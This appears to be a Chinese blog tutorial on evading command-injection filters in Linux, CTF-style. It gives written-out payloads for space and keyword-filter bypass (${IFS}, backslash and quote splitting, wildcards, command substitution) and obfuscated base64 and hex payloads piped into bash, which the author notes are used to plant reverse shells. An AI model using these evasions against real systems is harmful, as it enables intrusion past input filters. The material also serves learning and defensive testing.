首页 > 系统相关 >Linux下命令执行绕过技巧

Linux下命令执行绕过技巧

时间:2024-11-12 17:30:06浏览次数:1  
标签:技巧 IFS cat 命令 flag && Linux 绕过

一,符号绕过

1-1 分号绕过
用;号隔开每个命令,每个命令按照从左到右的顺序执行,彼此之间不关心是否失败,所有命令都会执行。

cat /etc/passwd;ls -l

1-2 管道符 | 
Linux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。

cat /etc/passwd | grep bash | wc -l

1-3 & 
格式: command1 & command2

&放在启动参数后面表示设置此进程为后台进程,上面的命令会先执行command2,再执行command1

ping -c 1 baidu.com & ls -l

1-4 && 
格式: command1 && command2 [&& commandx]

&& 表示前一条命令执行成功时,才执行后一条命令

1-4-1 第一种情况
第一个命令错误,第二个命令不会执行 

如:/etc/aini 不存在就会报错,后面的ls也不会执行

cat /etc/aini && ls -l

1-4-2 第二种情况
 所有命令都正确

pwd && ls -l && cat /etc/passwd

1-5 || 
格式:command1 || command2 [|| commandx]

跟&&符号相反,前面那条命令为假才会执行后面的命令

只要有一个命令返回真(命令返回值 $? == 0),后面的命令就不会被执行。–直到返回真的地方停止执行。

cat /etc/aini || pwd
第一个命令结果为假,所以继续执行第二个命令

1-6 绕过空格
1-6-1 {}绕过
{cat,etc/passwd}

1-6-2 ${IFS},$IFS$9,${IFS} 绕过
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat${IFS}flag.txt

1-6-3 <  绕过
cat<flag.txt

1-6-4 <> 绕过 
cat<>flag.txt

1-7 对关键字的绕过
1-7-1 (\)
比如会对cat falg 等一些常用关键字进行检测,可以用 \ 绕过
原理就是\转义符号只对一些特殊符号转义,对字母转义跟不转义效果一样
c\a\t<>f\l\a\g.t\x\t

1-7-2 '' 绕过
cat fla''g.php

1-7-3 双''来字符串拼接绕过
'fl' + 'ag'  = 'flag'
其实等于
'fl''ag' = 'flag'

1-7-4 变量绕过 
a=fl;b=ag;cat $a$b.php

1-8 通配符绕过
1-8-1 ? * 来绕过
?在linux里面可以进行代替字母
*在linux里面可以进行模糊匹配

cat<>fl*
cat flag?txt

1-8-2 [范围] 或 {f..h} 来绕过
[a-z]  表示匹配 a~z 

{f..h} 表示f~h 无论是否匹配成功都匹配一遍

cat fla[f-h].*
 分别匹配到了flag.txt和flag.php  

1-9 内联使用
1-9-1 `` 绕过
`` 里面的命令优先执行 

cat `ls | grep fla`
 分别匹配到了flag.txt和flag.php 

1-9-2 $() 绕过
cat $(ls | grep fla)

二,编码绕过

2-1 base64编码绕过 
经常用此方法来给对方服务器注入反向shell命令

echo Y2F0IGZsYWcudHh0 | base64 -d | bash -i

综合利用
1,绕过空格
2,绕过关键字过滤
3,编码

\e\c\h\o${IFS}Y2F0IGZsYWcudHh0${IFS}|${IFS}\b\a\s\e\6\4${IFS}-\d${IFS}|${IFS}\b\a\s\h${IFS}-\i

2-2 hex编码绕过 
2-2-1 熟悉xxd命令
  -a          缺省忽略转换: 使用‘*’替换空行.
   -b          二进数数据转储 (与 -ps,-i,-r不兼容). 默认为16进制.
   -c cols    每行多少列octets(特制8比特的字节). 默认为16列(-i: 12, -ps: 30).
   -E          使用EBCDIC字符集. 默认为ASCII字符集.
   -e          小端模式转储 (与 -ps,-i,-r不兼容).
   -g          在正常输出中,每组八位字节数. 默认为2个 (-e: 4).
   -h          输出此帮助.
   -i          使用C语言文件样式输出.
   -l len      在len个八位字节后停止.
   -o off      在off个偏移量后开始输出.
   -ps         以在行后添加16进制转储内容的格式输出.
   -r          逆向操作: 转换(或修补) 十六进制内容为二进制内容.
   -r -s off   在off个偏移量后开始转换16进制内容为二进制内容
   -s [+][-]seek  start at <seek> bytes abs. (or +: rel.) infile offset.(没看懂)
   -u          使用大写字母进行十六进制表示.
   -v          显示版本: "xxd V1.10 27oct98 by Juergen Weigert".

2-2-2 例子
echo 63617420666c61672e747874 | xxd -r -p|bash

标签:技巧,IFS,cat,命令,flag,&&,Linux,绕过
From: https://www.cnblogs.com/snad/p/18542330

相关文章

  • Linux搭建FTP服务器配置
    一、概念1.1介绍FTP:Filetransferprotocol文件传输协议端口TCP21:命令TCP20:数据1.2原理默认采用被动模式被动模式FTP为了解决服务器发起到客户的连接的问题,人们开发了一种不同的FTP连接方式。这就是所谓的被动方式,或者叫做PASV,当客户端通知服务器它处于被动模式时才启......
  • 入侵排查之Linux
    目录1.黑客入侵后的利用思路2.入侵排查思路2.1.账号安全2.1.1.用户信息文件/etc/passwd2.1.2.影子文件/etc/shadow2.1.3.入侵排查2.1.3.1.排查当前系统登录信息2.1.4.2.查询可以远程登录的账号信息2.2.历史命令2.2.1.基本使用2.2.1.1.root历史命令2.2.1.2.打开/ho......
  • atop——监控Linux系统资源与进程的工具(非内部程序,需安装)
    转自于:https://github.com/jaywcjlove/linux-command,后不赘述atop监控Linux系统资源与进程的工具补充说明[非内部程序,需要安装]它以一定的频率记录系统的运行状态,所采集的数据包含系统资源(CPU、内存、磁盘和网络)使用情况和进程运行情况,并能以日志文件的方式保存在磁盘中,服......
  • linux下oracle数据库重起
    切换到Oracle用户,使用SQLPlus作为系统管理员关闭和启动数据库,查看和重启监听进程。使用lsnrctl工具管理监听,检查状态。1、切换到oracle用户,进入sql命令窗口su-oraclesqlplus/assysdba2、关闭数据库shutdownimmediate;关掉exit退出3、查看......
  • Linux各种作死故障与修复方法,全面复盘全程高能,系统级故障救援经验汇总
     来自:https://www.cnblogs.com/liulianzhen99/p/17543477.html 原文连接:https://mp.weixin.qq.com/s/l_D3-jm4JWPIz3DecrRUyw1linux启动过程启动过程分析启动级别init0,init3,init5init6。systemd服务管理。systemd导致系统反复重启:2磁盘与分区配置文件磁盘UU......
  • 在Linux中使用Nginx和Docker进行项目部署
    前言随着云计算和微服务架构的发展,容器化技术如Docker变得越来越重要。本篇文章将向大家介绍如何在Linux操作系统中使用Nginx作为Web服务器,并结合Docker容器化技术来部署一个简单的Web应用。通过本文,你将学会基本的Linux命令、Nginx的安装与配置,以及如何使用Docker进行应用部......
  • Linux磁盘分区
    文章目录磁盘分区......
  • Linux 6.13 将提供对一系列 Pre-M1 苹果设备的基本支持
    虽然不像苹果M3/M4设备支持上游主线Linux内核那样令人兴奋,但对于那些拥有一些较旧的苹果(M1之前)设备的用户来说,即将发布的Linux6.13内核将支持一些较旧的SoC和板卡。即将到来的Linux6.13合并窗口将支持大量旧版AppleSoC和板卡,但这只是最基本/初始形式的支持......
  • Spring Boot编程训练系统:开发流程与技巧
    4系统概要设计4.1概述本系统采用B/S结构(Browser/Server,浏览器/服务器结构)和基于Web服务两种模式,是一个适用于Internet环境下的模型结构。只要用户能连上Internet,便可以在任何时间、任何地点使用。系统工作原理图如图4-1所示:图4-1系统工作原理图4.2系统结构本系统......
  • RAG 应用优化策略:从文档处理到检索技巧
    引言RAG(检索增强生成)应用的性能很大程度上取决于文档处理、分割策略和检索方法的优化。本文将系统地介绍RAG应用的各个环节优化策略,帮助开发者构建更高效的RAG系统。文档预处理优化非分割类型的文档转换器1.问答转换器(QATransformer)问答转换器可以将文档转换为问答对的......